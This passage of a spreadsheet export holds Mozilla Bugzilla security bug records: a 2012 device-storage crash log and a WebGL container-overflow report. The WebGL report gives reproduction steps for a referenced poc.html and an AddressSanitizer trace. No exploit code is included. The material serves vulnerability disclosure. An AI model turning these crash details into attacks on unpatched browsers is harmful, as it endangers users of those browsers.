      <c r="G1756" t="n">
        <v>3</v>
      </c>
      <c r="H1756" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1756" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1756" t="inlineStr">
        <is>
          <t>DOM: Device Interfaces</t>
        </is>
      </c>
      <c r="K1756" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1756" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1756" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N1756" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1756" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1756" t="inlineStr">
        <is>
          <t>[adv-track-main17+]</t>
        </is>
      </c>
      <c r="Q1756" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1756" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1756" t="inlineStr">
        <is>
          <t>mozilla18</t>
        </is>
      </c>
      <c r="T1756" t="n">
        <v>1</v>
      </c>
      <c r="U1756" t="n">
        <v>0</v>
      </c>
      <c r="V1756" t="n">
        <v>18</v>
      </c>
      <c r="W1756" t="inlineStr">
        <is>
          <t>A few of the other instances of this assertion have been marked as s-s, so doing so for this just in case.
Rev3 WINNT 6.1 mozilla-inbound debug test mochitests-2/5 on 2012-08-21 05:53:12 PDT for push 94f6e5a00d8b
slave: talos-r3-w7-068
https://tbpl.mozilla.org/php/getParsedLog.php?id=14560638&amp;tree=Mozilla-Inbound
{
1 INFO TEST-START | /tests/dom/devicestorage/test/test_basic.html
1889 INFO TEST-PASS | /tests/dom/devicestorage/ipc/test_ipc.html | Got second iframe load event.
++DOMWINDOW == 9 (0847EC48) [serial = 9] [outer = 08588378]
[Child 2600] WARNING: NS_ENSURE_TRUE(IsChromeProcess()) failed: file e:/builds/moz2_slave/m-in-w32-dbg/build/content/base/src/nsFrameMessageManager.cpp, line 601
++DOMWINDOW == 10 (085C04E0) [serial = 10] [outer = 08588378]
1890 INFO TEST-PASS | /tests/dom/devicestorage/ipc/test_ipc.html | /tests/dom/devicestorage/test/test_basic.html |  Should have getDeviceStorage
1891 INFO TEST-PASS | /tests/dom/devicestorage/ipc/test_ipc.html | /tests/dom/devicestorage/test/test_basic.html |  Should have gotten a storage
1892 INFO TEST-PASS | /tests/dom/devicestorage/ipc/test_ipc.html | /tests/dom/devicestorage/test/test_basic.html |  Should have a non-null request
1893 INFO TEST-PASS | /tests/dom/devicestorage/ipc/test_ipc.html | /tests/dom/devicestorage/test/test_basic.html |  File name should match
1894 INFO TEST-PASS | /tests/dom/devicestorage/ipc/test_ipc.html | /tests/dom/devicestorage/test/test_basic.html |  addSuccess was called
1895 INFO TEST-PASS | /tests/dom/devicestorage/ipc/test_ipc.html | /tests/dom/devicestorage/test/test_basic.html |  Should have getDeviceStorage
1896 INFO TEST-PASS | /tests/dom/devicestorage/ipc/test_ipc.html | /tests/dom/devicestorage/test/test_basic.html |  File name should match
1897 INFO TEST-PASS | /tests/dom/devicestorage/ipc/test_ipc.html | /tests/dom/devicestorage/test/test_basic.html |  wrong arraybuffer byteLength - 69 should equal 69
1898 INFO TEST-PASS | /tests/dom/devicestorage/ipc/test_ipc.html | /tests/dom/devicestorage/test/test_basic.html |  wrong values - My name is Doug Turner.  My IRC nick is DougT.  I like Maple cookies. should equal My name is Doug Turner.  My IRC nick is DougT.  I like Maple cookies.
Assertion failure: i &lt; Length() (invalid array index), at e:\builds\moz2_slave\m-in-w32-dbg\build\obj-firefox\dist\include\nsTArray.h:526
devicestorage/hi
[Child 2600] WARNING: shutting down early because of crash!: file e:/builds/moz2_slave/m-in-w32-dbg/build/dom/ipc/ContentChild.cpp, line 701
[Child 2600] WARNING: content process _exit()ing: file e:/builds/moz2_slave/m-in-w32-dbg/build/dom/ipc/ContentChild.cpp, line 746
nsStringStats
 =&gt; mAllocCount:           8042
 =&gt; mReallocCount:          587
 =&gt; mFreeCount:            3728  --  LEAKED 4314 !!!
 =&gt; mShareCount:          16580
 =&gt; mAdoptCount:            933
 =&gt; mAdoptFreeCount:        931  --  LEAKED 2 !!!
TEST-UNEXPECTED-FAIL | /tests/dom/devicestorage/test/test_basic.html | Exited with code -2147483645 during test run
INFO | automation.py | Application ran for: 0:04:34.412000
INFO | automation.py | Reading PID log: c:\users\cltbld\appdata\local\temp\tmpuclywqpidlog
==&gt; process 3472 launched child process 2600
INFO | automation.py | Checking for orphan process with PID: 2600
Downloading symbols from: http://ftp.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-inbound-win32-debug/1345545301/firefox-17.0a1.en-US.win32.crashreporter-symbols.zip
PROCESS-CRASH | /tests/dom/devicestorage/test/test_basic.html | application crashed (minidump found)
Crash dump filename: c:\users\cltbld\appdata\local\temp\tmpinfdxz\minidumps\504e12ce-a5a6-48c1-91e6-06f09751a7d2.dmp
Operating system: Windows NT
                  6.1.7600 
CPU: x86
     GenuineIntel family 6 model 23 stepping 10
     2 CPUs
Crash reason:  EXCEPTION_BREAKPOINT
Crash address: 0x6ba98aee
Thread 0 (crashed)
 0  xul.dll!nsTArray&lt;nsRefPtr&lt;mozilla::dom::devicestorage::DeviceStorageRequestParent::CancelableRunnable&gt;,nsTArrayDefaultAllocator&gt;::ElementAt(unsigned int) [nsTArray.h:94f6e5a00d8b : 526 + 0x21]
    eip = 0x6ba98aee   esp = 0x0024d50c   ebp = 0x0024d514   ebx = 0x00000001
    esi = 0x13127704   edi = 0x00000001   eax = 0x00000000   ecx = 0x631477d2
    edx = 0x72a5e4d8   efl = 0x00000206
    Found by: given as instruction pointer in context
 1  xul.dll!mozilla::dom::devicestorage::DeviceStorageRequestParent::ActorDestroy(mozilla::ipc::IProtocolManager&lt;mozilla::ipc::RPCChannel::RPCListener&gt;::ActorDestroyReason) [DeviceStorageRequestParent.cpp:94f6e5a00d8b : 132 + 0x7]
    eip = 0x6ba9918e   esp = 0x0024d51c   ebp = 0x0024d538
    Found by: call frame info
 2  xul.dll!mozilla::dom::devicestorage::PDeviceStorageRequestParent::DestroySubtree(mozilla::ipc::IProtocolManager&lt;mozilla::ipc::RPCChannel::RPCListener&gt;::ActorDestroyReason) [PDeviceStorageRequestParent.cpp:94f6e5a00d8b : 332 + 0x10]
    eip = 0x6c2c8128   esp = 0x0024d530   ebp = 0x0024d538
    Found by: stack scanning
 3  xul.dll!mozilla::dom::devicestorage::PDeviceStorageRequestParent::Send__delete__(mozilla::dom::devicestorage::PDeviceStorageRequestParent *,mozilla::dom::devicestorage::DeviceStorageResponseValue const &amp;) [PDeviceStorageRequestParent.cpp:94f6e5a00d8b : 96 + 0xa]
    eip = 0x6c2c8dd6   esp = 0x0024d540   ebp = 0x0024d574
    Found by: call frame info
 4  xul.dll!mozilla::dom::devicestorage::DeviceStorageRequestParent::PostPathResultEvent::CancelableRun() [DeviceStorageRequestParent.cpp:94f6e5a00d8b : 434 + 0x1f]
    eip = 0x6ba98eee   esp = 0x0024d57c   ebp = 0x0024d5b4
    Found by: call frame info
 5  xul.dll!mozilla::dom::devicestorage::DeviceStorageRequestParent::CancelableRunnable::Run() [DeviceStorageRequestParent.h:94f6e5a00d8b : 51 + 0x6]
    eip = 0x6ba9a88d   esp = 0x0024d5bc   ebp = 0x0024d5c4
    Found by: call frame info
 6  xul.dll!nsThread::ProcessNextEvent(bool,bool *) [nsThread.cpp:94f6e5a00d8b : 624 + 0xd]
    eip = 0x6c491e70   esp = 0x0024d5cc   ebp = 0x0024d5f4
    Found by: call frame info
 7  xul.dll!NS_ProcessNextEvent_P(nsIThread *,bool) [nsThreadUtils.cpp:94f6e5a00d8b : 220 + 0xc]
    eip = 0x6c4434f7   esp = 0x0024d5fc   ebp = 0x0024d608
    Found by: call frame info
 8  xul.dll!mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate *) [MessagePump.cpp:94f6e5a00d8b : 116 + 0x9]
    eip = 0x6c2ba253   esp = 0x0024d610   ebp = 0x0024d634
}</t>
        </is>
      </c>
      <c r="X1756" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1757">
      <c r="A1757" t="n">
        <v>1836705</v>
      </c>
      <c r="B1757" t="inlineStr">
        <is>
          <t>2023-06-05 00:09:44 -0700</t>
        </is>
      </c>
      <c r="C1757" t="inlineStr">
        <is>
          <t>Firefox Container Overflow in WebGL Vulnerability</t>
        </is>
      </c>
      <c r="D1757" t="inlineStr">
        <is>
          <t>2024-05-30 11:09:50 -0700</t>
        </is>
      </c>
      <c r="E1757" t="n">
        <v>1</v>
      </c>
      <c r="F1757" t="n">
        <v>1</v>
      </c>
      <c r="G1757" t="n">
        <v>3</v>
      </c>
      <c r="H1757" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1757" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1757" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K1757" t="inlineStr">
        <is>
          <t>Firefox 116</t>
        </is>
      </c>
      <c r="L1757" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1757" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1757" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1757" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1757" t="inlineStr">
        <is>
          <t>[fixed in bug  1849433][adv-main119+][adv-ESR115.4+]</t>
        </is>
      </c>
      <c r="Q1757" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1757" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S1757" t="inlineStr">
        <is>
          <t>119 Branch</t>
        </is>
      </c>
      <c r="T1757" t="n">
        <v>1</v>
      </c>
      <c r="U1757" t="n">
        <v>0</v>
      </c>
      <c r="V1757" t="n">
        <v>28</v>
      </c>
      <c r="W1757" t="inlineStr">
        <is>
          <t>Created attachment 9337404
poc.html
Steps to reproduce:
 An Attacker must open a arbitrary generated HTML file to exploit this vulnerability
0. open vmware fusion ubuntu Desktop
1. and open poc server python3 -m http.server 9292
2. ./firefox
3. open http://localhost:9292/poc.html
Actual results:
3.	Exact product that was found to be vulnerable including complete version information
  a. Product : Vmware Fusion Prefessional 13.0.2 / Ubuntu 22.04.2 LTS / Linux Kernel 5.19.0-43-generic 
  b. HOST    : macOS 13.3.1 (a)
4. Crash log - firefox
```log
Crash Annotation GraphicsCriticalError: |[0][GFX1-]: vaapitest: ERROR (t=2.60144) [GFX1-]: vaapitest: ERROR
Crash Annotation GraphicsCriticalError: |[0][GFX1-]: vaapitest: ERROR (t=2.60144) |[1][GFX1-]: vaapitest: VA-API test failed: failed to initialise VAAPI connection.
 (t=2.60195) [GFX1-]: vaapitest: VA-API test failed: failed to initialise VAAPI connection.
console.error: ({})
JavaScript error: resource://gre/modules/XULStore.sys.mjs, line 60: Error: Can't find profile directory.
console.warn: TopSitesFeed: Failed to fetch data from Contile server: can't access property "match", cacheHeader is null
JavaScript error: resource://gre/modules/PromiseWorker.sys.mjs, line 102: Error: Could not get children of file(/home/xixon0531/.mozilla/firefox/lo5wnkso.default-default-1/thumbnails) because it does not exist
AddressSanitizer:DEADLYSIGNAL
=================================================================
==9925==ERROR: AddressSanitizer: SEGV on unknown address 0x7f0c43e00000 (pc 0x7f0c6d4d9606 bp 0x616000728180 sp 0x7f0c717fa068 T34)
==9925==The signal is caused by a WRITE memory access.
    #0 0x7f0c6d4d9606  (/usr/lib/x86_64-linux-gnu/dri/vmwgfx_dri.so+0xad9606) (BuildId: 293fc30af36a77064beef6344631fdf788ebaacb)
    #1 0x7f0c6d3c7daa  (/usr/lib/x86_64-linux-gnu/dri/vmwgfx_dri.so+0x9c7daa) (BuildId: 293fc30af36a77064beef6344631fdf788ebaacb)
    #2 0x7f0c6d3933ab  (/usr/lib/x86_64-linux-gnu/dri/vmwgfx_dri.so+0x9933ab) (BuildId: 293fc30af36a77064beef6344631fdf788ebaacb)
    #3 0x7f0c6cc76034  (/usr/lib/x86_64-linux-gnu/dri/vmwgfx_dri.so+0x276034) (BuildId: 293fc30af36a77064beef6344631fdf788ebaacb)
    #4 0x7f0d17b2f6eb in raw_fDrawArraysInstanced /builds/worker/checkouts/gecko/gfx/gl/GLContext.h:2506:5
    #5 0x7f0d17b2f6eb in mozilla::gl::GLContext::fDrawArraysInstanced(unsigned int, int, int, int) /builds/worker/checkouts/gecko/gfx/gl/GLContext.h:2490:5
    #6 0x7f0d17b2c3de in mozilla::WebGLContext::DrawArraysInstanced(unsigned int, int, int, int) /builds/worker/checkouts/gecko/dom/canvas/WebGLContextDraw.cpp:815:13
    #7 0x7f0d17c08616 in DrawArraysInstanced /builds/worker/checkouts/gecko/dom/canvas/HostWebGLContext.h:750:15
    #8 0x7f0d17c08616 in auto bool mozilla::MethodDispatcher&lt;mozilla::WebGLMethodDispatcher, 100ul, void (mozilla::HostWebGLContext::*)(unsigned int, int, int, int) const, &amp;mozilla::HostWebGLContext::DrawArraysInstanced(unsigned int, int, int, int) const&gt;::DispatchCommand&lt;mozilla::HostWebGLContext&gt;(mozilla::HostWebGLContext&amp;, unsigned long, mozilla::webgl::RangeConsumerView&amp;)::'lambda'(auto&amp;...)::operator()&lt;unsigned int, int, int, int&gt;(auto&amp;...) const /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:253:13
    #9 0x7f0d17bb7406 in __invoke_impl&lt;bool, (lambda at /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:245:11), unsigned int &amp;, int &amp;, int &amp;, int &amp;&gt; /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/invoke.h:60:14
    #10 0x7f0d17bb7406 in __invoke&lt;(lambda at /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:245:11), unsigned int &amp;, int &amp;, int &amp;, int &amp;&gt; /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/invoke.h:95:14
    #11 0x7f0d17bb7406 in __apply_impl&lt;(lambda at /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:245:11), std::tuple&lt;unsigned int, int, int, int&gt; &amp;, 0UL, 1UL, 2UL, 3UL&gt; /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/tuple:1678:14
    #12 0x7f0d17bb7406 in apply&lt;(lambda at /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:245:11), std::tuple&lt;unsigned int, int, int, int&gt; &amp;&gt; /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/tuple:1687:14
    #13 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:244:14
    #14 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #15 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #16 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #17 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #18 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #19 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #20 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #21 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #22 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #23 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #24 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #25 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #26 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #27 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #28 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #29 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #30 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #31 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #32 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #33 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #34 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #35 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #36 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #37 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #38 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #39 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #40 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #41 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #42 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #43 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #44 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #45 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #46 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #47 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #48 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #49 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #50 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #51 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #52 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #53 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #54 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #55 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #56 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #57 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #58 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #59 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #60 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #61 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #62 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #63 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #64 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #65 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #66 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #67 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #68 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #69 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #70 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #71 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #72 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #73 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #74 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #75 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #76 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #77 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #78 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #79 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #80 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #81 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #82 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #83 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #84 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #85 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #86 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #87 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #88 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #89 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #90 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #91 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #92 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #93 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #94 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #95 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #96 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #97 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #98 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
